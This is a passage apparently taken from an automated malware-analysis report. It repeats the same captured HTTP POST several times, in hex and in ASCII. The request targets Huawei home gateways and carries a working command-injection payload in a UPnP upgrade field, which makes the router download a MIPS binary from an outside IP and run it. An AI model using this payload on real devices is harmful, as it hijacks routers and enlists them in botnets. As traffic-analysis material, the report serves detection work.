3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
              Source: global trafficHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Content-Length: 430Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 32 31 32 2e 36 34 2e 31 39 39 2e 32 33 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 78 30 6f 78 30 6f 78 30 6f 78 44 65 66 61 75 6c 74 2f 7a 30 72 30 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 212.64.199.23 -l /tmp/.unstable -r /x0ox0ox0oxDefault/z0r0.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
